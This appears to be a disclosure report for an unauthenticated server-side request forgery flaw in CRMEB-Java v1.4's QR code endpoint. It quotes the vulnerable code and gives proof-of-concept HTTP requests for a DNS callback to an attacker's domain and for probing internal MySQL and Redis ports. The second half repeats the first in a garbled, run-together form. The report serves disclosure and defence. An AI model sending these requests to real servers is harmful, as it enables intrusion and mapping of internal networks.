Description
CRMEB-Java v1.4 contains a Server-Side Request Forgery (SSRF) vulnerability in the POST /api/front/qrcode/base64 endpoint. The url parameter is directly passed to RestTemplate.getForEntity() without any validation, allowing attackers to make arbitrary HTTP requests from the server. This endpoint is whitelisted in the authentication interceptor, requiring no login credentials.
Vulnerability Details
Vulnerable File: crmeb-common/src/main/java/com/zbkj/common/utils/RestTemplateUtil.java
public byte[] getBuffer(String url) {
return restTemplate.getForEntity(url, byte[].class).getBody(); // no validation
}Entry Point: crmeb-front/src/main/java/com/zbkj/front/controller/QrCodeController.java
@RequestMapping(value = "/base64", method = RequestMethod.POST)
public CommonResult<Map<String, Object>> get(@RequestParam String url) {
return CommonResult.success(qrCodeService.base64(url));
}Authentication Bypass: crmeb-front/src/main/java/com/zbkj/front/config/WebConfig.java
registry.addInterceptor(frontTokenInterceptor()).
addPathPatterns("/api/front/**").
excludePathPatterns("/api/front/qrcode/**"); // no auth requiredPoC
1. Verify SSRF via DNS callback
POST /api/front/qrcode/base64 HTTP/1.1
Host: <target>
Content-Type: application/x-www-form-urlencoded
url=http://<your-dnslog-domain>
Check DNS log for callback from the server, confirming SSRF.
2. Internal network probing
POST /api/front/qrcode/base64 HTTP/1.1
Host: <target>
Content-Type: application/x-www-form-urlencoded
url=http://mysql:3306
Response:
{"code":500,"message":"I/O error on GET request for \"http://mysql:3306\": Invalid Http response"}
POST /api/front/qrcode/base64 HTTP/1.1
Host: <target>
Content-Type: application/x-www-form-urlencoded
url=http://redis:6379Response:
{"code":500,"message":"I/O error on GET request for \"http://redis:6379\": Invalid Http response"}Error messages confirm the server successfully connected to internal MySQL and Redis services.
Description
CRMEB-Java v1.4 contains a Server-Side Request Forgery (SSRF) vulnerability in the
POST /api/front/qrcode/base64endpoint. Theurlparameter is directly passed toRestTemplate.getForEntity()without any validation, allowing attackers to make arbitrary HTTP requests from the server. This endpoint is whitelisted in the authentication interceptor, requiring no login credentials.Vulnerability Details
Vulnerable File:
crmeb-common/src/main/java/com/zbkj/common/utils/RestTemplateUtil.javaEntry Point:
crmeb-front/src/main/java/com/zbkj/front/controller/QrCodeController.javaAuthentication Bypass:
crmeb-front/src/main/java/com/zbkj/front/config/WebConfig.javaPoC
1. Verify SSRF via DNS callback
Check DNS log for callback from the server, confirming SSRF.
2. Internal network probing
Response:
{"code":500,"message":"I/O error on GET request for \"http://mysql:3306\": Invalid Http response"} POST /api/front/qrcode/base64 HTTP/1.1 Host: <target> Content-Type: application/x-www-form-urlencoded url=http://redis:6379Response:
{"code":500,"message":"I/O error on GET request for \"http://redis:6379\": Invalid Http response"}Error messages confirm the server successfully connected to internal MySQL and Redis services.